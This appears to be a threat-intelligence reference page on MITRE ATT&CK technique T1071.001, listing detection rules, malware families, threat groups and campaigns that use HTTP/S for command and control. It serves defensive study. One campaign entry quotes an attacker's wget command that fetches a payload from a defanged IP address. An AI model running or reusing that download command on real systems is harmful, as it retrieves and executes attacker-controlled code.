Web Protocols

T1071.001

Sub-technique of T1071 Application Layer Protocol.View on attack.mitre.org

About this technique

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S and WebSocket that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Detection rules49

Rules on DetectionCode tagged with T1071.001.

Sigma31

RuleLevelLog source
HackTool - BabyShark Agent Default URL PatterncriticalNULL / proxy
PwnDrp AccesscriticalNULL / proxy
APT User AgenthighNULL / proxy
Bitsadmin to Uncommon IP Server AddresshighNULL / proxy
Bitsadmin to Uncommon TLDhighNULL / proxy
Crypto Miner User AgenthighNULL / proxy
Exploit Framework User AgenthighNULL / proxy
HackTool - CobaltStrike Malleable Profile Patterns - ProxyhighNULL / proxy
HackTool - Empire UserAgent URI CombohighNULL / proxy
Malware User AgenthighNULL / proxy
Outbound Network Connection Initiated By Microsoft Dialerhighwindows / network_connection
Raw Paste Service AccesshighNULL / proxy
Renamed Visual Studio Code Tunnel Executionhighwindows / process_creation
Suspicious User AgenthighNULL / proxy
Wannacry Killswitch DomainhighNULL / dns

Splunk18

RuleTypeRiskData source
Cisco NVM - Osascript Network Connection for a Long DurationAnomalyNULLCisco Network Visibility Module Flow Data
Cisco Secure Firewall - Blacklisted SSL Certificate FingerprintTTPNULLCisco Secure Firewall Threat Defense Connection Event
Cisco Secure Firewall - Connection to File Sharing DomainAnomalyNULLCisco Secure Firewall Threat Defense Connection Event
Cisco Secure Firewall - High EVE Threat ConfidenceAnomalyNULLCisco Secure Firewall Threat Defense Connection Event
Cisco Secure Firewall - Wget or Curl DownloadAnomalyNULLCisco Secure Firewall Threat Defense Connection Event
Detect web traffic to dynamic domain providersTTPNULL
HTTP C2 Framework User AgentTTPNULLSuricata
HTTP Duplicated HeaderAnomalyNULLSuricata
HTTP Malware User AgentTTPNULLSuricata
HTTP Possible Request SmugglingTTPNULLSuricata
HTTP PUA User AgentAnomalyNULLSuricata
HTTP Rapid POST with Mixed Status CodesAnomalyNULLNginx Access
HTTP Request to Reserved Name on IIS ServerTTPNULLSuricata
HTTP RMM User AgentAnomalyNULLSuricata
HTTP Scripting Tool User AgentAnomalyNULLNginx Access

Groups57

Show 33 more

Software344

Show 320 more
BeaverTailBisonalBlackEnergyBlackMouldBLINDINGCANBLUELIGHTBOLDMOVEBOOKWORMBoomBoxBRICKSTORMBrute Ratel C4BUBBLEWRAPBundloreCarbanakCarberpCarbonCardinal RATChaesCharmPowerChChesCHIMNEYSWEEPChina ChopperCHOPSTICKClamblingCloudDukeCOATHANGERCobalt StrikeComnieComRATCORESHELLCosmicDukeCovenantCozyCarCreepyDriveCreepySnailCrimsonCrutchCSPY DownloaderCuckoo StealerCyclops BlinkDaclsDanBotDarkCometDarkTortillaDarkWatchmanDaserfDealersChoiceDEATHRANSOMDiavolDipsindDokiDonutdown_newDownPaperDRATzarusDridexDrovorubDustySkyDyreEgregorEliseELMEREmissaryEmotetEmpireEpicEvilBunnyevilginx2Exaramel for LinuxExplosiveFatDukeFelismusFELIXROOTFinal1stspyFlagproFlawedAmmyyFoggyWebFRAMESTINGFRPGazerGelsemiumGeminiDukeGet2GlassWormGold DragonGoldenSpyGoldFinderGoldMaxGomirGoopyGrandoreiroGravityRATGreyEnergyGrimAgentGuLoaderHAMMERTOSSHavocHAWKBALLHelminthHexEval LoaderHi-ZorHikitHTTPBrowserhttpclientHTTPTroyHyperBroIceAppleIcedIDIndustroyerInvisibleFerretInvisiMoleIPsec HelperIronWindIxesheJHUHUGITKali365KapekaKazuarKevinKeydnapKEYPLUGKGH_SPYKinsingKoadicKomplexKONNIKOPILUWAKLAMEHUGLatrodectusLightSpyLIGHTWIRELine DancerLine RunnerLiteDukeLitePowerLockBit 3.0LokibotLookBackLOWBALLLumma StealerLunarWebMacheteMacSpyMafaldaMagicRATMangoManjusakaMarkiRATMazeMCMDMechaFloundermetaMainMetamorfoMicropsiaMilanMini Shai-HuludMiniDukeMis-TypeMongallMOPSLEDMore_eggsMoriMuddyViperMythicNeo-reGeorgNeoichorNETEAGLENETWIRENGLiteNICECURLNinjanjRATNOKKIOctopusOilBoosterOkrumOLDBAITOnionDukeOopsIEOSX_OCEANLOTUS.DOut1OutSteelOwaAuthP.A.S. WebshellPandoraPcSharePeppyPHPsertPinchDukePingPullPLEADPlugXpngdownerPoetRATPolyglotDukePonyPoshC2PowerShowerPOWERTONPowGoopPOWRUNERProxysvcPsyloPteranodonPUBLOADPULSECHECKPUNCHBUGGYPupyQakBotQUADAGENTQuick AssistQUIETCANARYQuietSieveRaccoon StealerRainyDayRamsayRaspberry RobinRATANKBARCSessionRDATReaverRedLeavesRedLine StealerreGeorgReginRemexiRemsecREvilRGDoorRIFLESPINERIPTIDERising SunROKRATRTMRustyWaterS-TypeSagerunexSaint BotSakulaSampleCheck5000SamuraiSeaDukeSeasaltServHelperShadowPadShai-HuludShamoonSharkShimRatShimRatReporterShrinkLockerSibotSideTwistSLIGHTPULSESliverSLOTHFULMEDIASmall SieveSmoke LoaderSMOKEDHAMSnappyTCPSNUGRIDESoreFangSparkSpeakUpSquirrelwaffleSTARWHALESTEADYPULSEStealBitStrelaStealerStrongPityStuxnetSUGARDUMPSUNBURSTSUPERNOVASVCReadySys10TaidoorTAMECATTeamPCP Cloud StealerThiefQuestTHINCRUSTTinyTurlaTomirisTONESHELLTorismaTrailBlazerTRANSLATEXTTrickBotTrojan.KaraganyTroll StealerTSCookieTsundere BotnetTurianUBoatRATUPPERCUTUroburosUrsnifValakVaporRageVasportVBShowerVERMINWellMessWhisperGateWindTailWinMMWinnti for LinuxWinnti for WindowsWIREFIREWoody RATXbashxCaonXLoaderXORIndex LoaderYAHOYAHZebrocyZeroTZeus PandaZLibZxShell

Campaigns21

Procedure examples422

Groups57

Used byProcedure example
GroupAPT18

APT18 uses HTTP for C2 communications.

GroupAPT19

APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.

GroupAPT28

Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.

GroupAPT32

APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.

GroupAPT33

APT33 has used HTTP for command and control.

GroupAPT37

APT37 uses HTTPS to conceal C2 communications.

GroupAPT38

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.

GroupAPT39

APT39 has used HTTP in communications with C2.

View all 57 groups examples

Software344

Used byProcedure example
Malware3PARA RAT

3PARA RAT uses HTTP for command and control.

Malware4H RAT

4H RAT uses HTTP for command and control.

MalwareABK

ABK has the ability to use HTTP in communications with C2.

MalwareAction RAT

Action RAT can use HTTP to communicate with C2 servers.

MalwareADVSTORESHELL

ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.

MalwareAgent Tesla

Agent Tesla has used HTTP for C2 communications.

MalwareAmadey

Amadey has used HTTP for C2 communications.

MalwareAnchor

Anchor has used HTTP and HTTPS in C2 communications.

View all 344 software examples

Campaigns21

Used byProcedure example
Campaign2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests.

Campaign3CX Supply Chain Attack

During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request.

CampaignAPT41 DUST

APT41 DUST used HTTPS for command and control.

CampaignArcaneDoor

ArcaneDoor command and control activity was conducted through HTTP.

CampaignC0017

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.

CampaignC0018

During C0018, the threat actors used HTTP for C2 communications.

CampaignC0021

During C0021, the threat actors used HTTP for some of their C2 communications.

CampaignFrankenstein

During Frankenstein, the threat actors used HTTP GET requests for C2.

View all 21 campaigns examples

References2

  1. Brazking-Websockets Open source
    Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.
  2. CrowdStrike Putter Panda Open source
    Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.